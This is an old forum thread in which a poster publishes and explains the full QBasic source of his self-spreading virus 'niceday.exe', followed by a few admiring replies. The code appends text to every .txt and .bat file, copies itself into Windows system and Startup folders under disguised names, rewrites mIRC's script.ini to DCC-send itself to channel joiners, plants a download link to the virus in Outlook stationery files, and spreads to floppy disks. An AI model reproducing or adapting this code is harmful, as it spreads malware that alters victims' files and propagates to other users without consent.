Writing the QBasic Virus

[jethro]

Source code/Original Post: http://www.antionline.com/showthread...216#post541952

Writing the QBasic Virus by Jethro
----------------------------------

Index:

o Introduction
o Decisions
o Source Code Explanations
o Conclusion


Introduction
------------

With a sudden ballooning in size of crappy VBS virii over the last few
years, I noticed that I had never seen a virus written in QBasic.

So to be original, I wrote one and you can find it in the programming
section of technorats, called ``qbasic_virus.htm`` or something like
that.

I got a lot of emails (7) after I wrote that and posted it on
AntiOnline, from people wanting me to explain the code. So, I am
writing this text.



Decisions
---------

Decisions I had to make while writing the virus was what it was going
to do. I wanted to make it un-destructive, because I think virii that
actually wreak machines are both a waste of time and effort.

Because I didn't want to use ASM in my virus (there's plenty of ASM
virii out there), so I was restricted, in that I couldn't make it
really polymorphic or self-modifying, without losing sight of the
objective, that I could mimic VBS virii and make a short and sweet
piece of code.

First of all, it had to actually do something, so you could call it a
virus. So I made it write a line at the end of text (*.txt) files
(which I think is pretty harmless) and two lines at the end of batch
(*.bat) files (one being a :: comment).

Then came the bulk of the code, how it was to spread. I studied my
version of Microsoft Outlook Express for a while and realised that the
best and most effective way for it to spread would be through the
email (*.eml) files and the Stationary (which happen to be *.htm)
files.

I also wanted it to spread through *.htm* files, so any web designers
publishing web pages would have a on their pages
which said that they were infected.

It just so happened that I was able to mix the webpage spreading device
and the email spreading device together, so if the virus found that it
was infecting a page in a Microsoft directory, it would treat it as a
Stationary file and just put a link to the virus, which was to be put
up on some server.

I had seen many VBS virii which spread through mIRC, so, like the
I-Love-You virus, I put a line in the script.ini file in the mIRC
directory (if it existed on the computer) which would DCC the virus to
whoever joined the channel that the infected user was in.

My last two decisions, were that I wanted the virus to spread locally
around the infectee's computer and I wanted it to spread across floppy
disks.

So I wrote down on a piece of paper what I wanted it to do and I scored
off each objective as I had completed it. Here is the source code
(which as I have said, can be accessed through my website) and my
explanations as to why I put something in and what it does.

You're probably going to need at least a basic (no pun intended)
understanding of QBasic, because this is not a QBasic tutorial.



Source Code Explanations
------------------------

****
' Written by Jethro
' Have a Nice day!
****

That part is just my intro, so anybody looking at the source code would
know how made it and could guess what it's called (niceday.exe)

****
DECLARE SUB DRAWWINDOW ()
DECLARE SUB INFECTFILES ()
DECLARE SUB SPREAD2MIRC ()
DECLARE SUB REMOTESPREAD ()
DECLARE SUB SPREAD (file2spr$, where2spr$)
DECLARE SUB INFECTHTML ()
DECLARE SUB IFEXIST (filen$)
DECLARE SUB INFECTBATCH ()
DECLARE SUB INFECTFLOPPY ()
****

Just declaring the subs.

****
COMMON SHARED itexist, nodrive

itexist = 0
nodrive = 0
****

That is just so I can use those variables in every sub. ``itexist`` is
what I am using to check if a file exists and ``nodrive`` is what I am
using to check whether the floppy drive is funtioning

****
ON ERROR GOTO ohsoz
****

That is so it doesn't spit up and ugly error. How embarrising would it
be, if a user, thinking it was just a normal program, saw "Floppy
Drive no found" or something?

****
blinks = 2

FOR i = 1 TO blinks
CLS
LOCATE 5, 12: PRINT "Jethro Perazza Jones"
LOCATE 6, 13: PRINT "Have a Nice Day Now"
SLEEP 1
DRAWWINDOW
SLEEP 1
NEXT i
****

That is just my fancy entrance message. My ``DRAWWINDOW`` sub does the
bulk of it, ie. actually drawing the window.

****
INFECTFILES

SPREAD2MIRC

REMOTESPREAD

INFECTHTML

INFECTBATCH

INFECTFLOPPY
****

This is just calling the subs. When I was posting the source code, I
was debating whether I should comment these out, so someone with no
QBasic knowledge, but who was trying to run this anyway, wouldn't get
it work. But I decided not to, in case I got a load of emails saying
``Your virus doesn't work! WAAAA!``

****
ohsoz:

errorhandler:

SELECT CASE ERR

CASE IS = 71
nodrive = 1

END SELECT

RESUME NEXT
****

This is the error handler and also works to tell the ``INFECTFLOPPY``
sub that there is no floppy disk in the drive. Before I put in this
error handler, I used to get BSODs, so I think it is a very welcome
and important addition .

****
SUB DRAWWINDOW
LOCATE 4, 10: PRINT "É"
LOCATE 5, 10: PRINT "º"
LOCATE 6, 10: PRINT "º"
LOCATE 7, 10: PRINT "È"
LOCATE 4, 48: PRINT "»"
LOCATE 5, 48: PRINT "º"
LOCATE 6, 48: PRINT "º"
LOCATE 7, 48: PRINT "¼"
FOR i = 11 TO 47
LOCATE 4, i: PRINT "Í"
LOCATE 7, i: PRINT "Í"
NEXT i
END SUB
****

Pointless sub, just draws the window for the entrance screen. Also,
gives you a few seconds to quit, if you accidentaly run the virus
yourself!

****
SUB IFEXIST (filen$)
fred$ = ""
SHELL "DIR " + filen$ + " /b>files.$$$"
OPEN "files.$$$" FOR INPUT AS #1
DO WHILE NOT (EOF(1))
INPUT #1, fred$
LOOP
CLOSE #1: KILL "files.$$$"
IF NOT LEN(fred$) >= 1 THEN itexist = 0
IF LEN(fred$) >= 1 THEN itexist = 1
END SUB
****

I have to admit, this is one cool looking sub. Ugly, but cool
nonetheless. Basically, this issues a DIR for the file in question and
if it exists, the ``itexist`` variable is given the value 1, if not,
it is given the value 0. Boolean-style.

****
SUB INFECTBATCH
SHELL "DIR C:\*.bat /B /S>batch.$$$"
OPEN "batch.$$$" FOR INPUT AS #1
DO WHILE NOT (EOF(1))
INPUT #1, file2do$
OPEN file2do$ FOR APPEND AS #2
PRINT #2, ""
PRINT #2, "echo Ran %0"
PRINT #2, ":: Having a good day?"
CLOSE #2
CLOSE #1
LOOP
KILL "batch.$$$"
END SUB
****

This basically runs through all the batch files on the system and adds
to lines to it. The blank line at the start just puts the text on a
new line. "echo Ran %0" will just print out to the screen "Ran
<program name>" and the ":: Having a good day?" is just a comment and
will be ignored by the MS-DOS command interpreter. You can see how
easy it would be to issue a KILL command on all the batch files, but
that would be stupid and mean.

****
SUB INFECTFILES
PRINT "Scanning for files..."
SHELL "DIR C:\*.txt /S /B>phy.lst"
OPEN "phy.lst" FOR INPUT AS #1
DO WHILE NOT (EOF(1))
INPUT #1, phyle$
OPEN phyle$ FOR APPEND AS #2
PRINT #2, ""
PRINT #2, "Jethro P. Jones says: 'Have a nice day now!'"
CLOSE #2
LOOP
CLOSE #1
KILL "phy.lst"
PRINT "Scanning for needed drivers..."
END SUB
****

This basicallly does the same as the ``INFECTBATCH`` sub, only it adds
one line to all *.txt files.

****
SUB INFECTFLOPPY
ON ERROR GOTO errorhandler
SPREAD "niceday.exe", "A:\niceday.exe"
END SUB
****

This basically sends ``niceday.exe`` to the floppy disk, if it is in
the floppy drive.

****
SUB INFECTHTML
SHELL "DIR C:\*.htm* /B /S>tempfile.$$$"
OPEN "tempfile.$$$" FOR INPUT AS #1
DO WHILE NOT (EOF(1))
INPUT #1, file2do$
OPEN file2do$ FOR APPEND AS #2
PRINT #2, ""
IF NOT INSTR(file2do$, "micros") THEN PRINT #2, ""
IF INSTR(file2do$, "micros") THEN PRINT #2, "<a href=http://www.myserver.com/jethro/happyday.exe>Download this for a very happy day!</a>"
CLOSE #2
LOOP
CLOSE #1
KILL "tempfile.$$$"
END SUB
****

This infects HTML files. If they are in a Microsoft folder (like
Stationary files), it adds a link to a program (the virus) on a
server, if not, it just adds a comment to the page, because it's
possibly a webpage ready for publication.

****
SUB REMOTESPREAD
SPREAD "niceday.exe", "C:\WINDOWS\niceday.exe"
SPREAD "niceday.exe", "C:\WINDOWS\SYSTEM\winpgup.exe"
SPREAD "niceday.exe", "C:\WINDOWS\COMMAND\win32dice.exe"
SPREAD "niceday.exe", "C:\autoexec.exe"
SPREAD "niceday.exe", "C:\WINDOWS\StartM~1\Progra~1\Startup\win32pgup.exe"
SPREAD "niceday.exe", "C:\WINDOWS\Progra~1\niceday.exe"
END SUB
****

This just spreads the virus about a bit, locally in the computer.

****
SUB SPREAD (file2spr$, where2spr$)
SHELL "COPY " + file2spr$ + " " + where2spr$ + ">nul"
END SUB
****

This just helps spread the file about easily.

****
SUB SPREAD2MIRC
ON ERROR GOTO ohsoz
IFEXIST "C:\mirc\script.ini": IF itexist = 0 THEN GOTO 5
OPEN "C:\mirc\script.ini" FOR OUTPUT AS #1
PRINT #1, "[script]"
PRINT #1, "n0=on 1:JOIN:#:/.dcc send -c $nick C:\WINDOWS\niceday.exe"
CLOSE #1
5
END SUB
****

This adds a line to mIRC's script.ini file so it can spread easily
through IRC.



Conclusion
----------

Even just writing this text, I can see ways of optimising the code and
I have new ideas, so don't be suprised if you see a sequel to the
NiceDay.exe virus.

Have fun,
Jethro

[ntsa]

very nice - anyone who hasn't alread been to Jethro's technorats site I can heartily reccomend it!

Keep up the good work Jethro!

[jethro]

Ah shucks

Originally posted here by ntsa
very nice - anyone who hasn't alread been to Jethro's technorats site I can heartily reccomend it!

Keep up the good work Jethro!

[s0nIc]

lol dang.. brings back old memories

[L1L H@X0R]

Awsome man Im just starting 2 learn QB give me a shout some time aight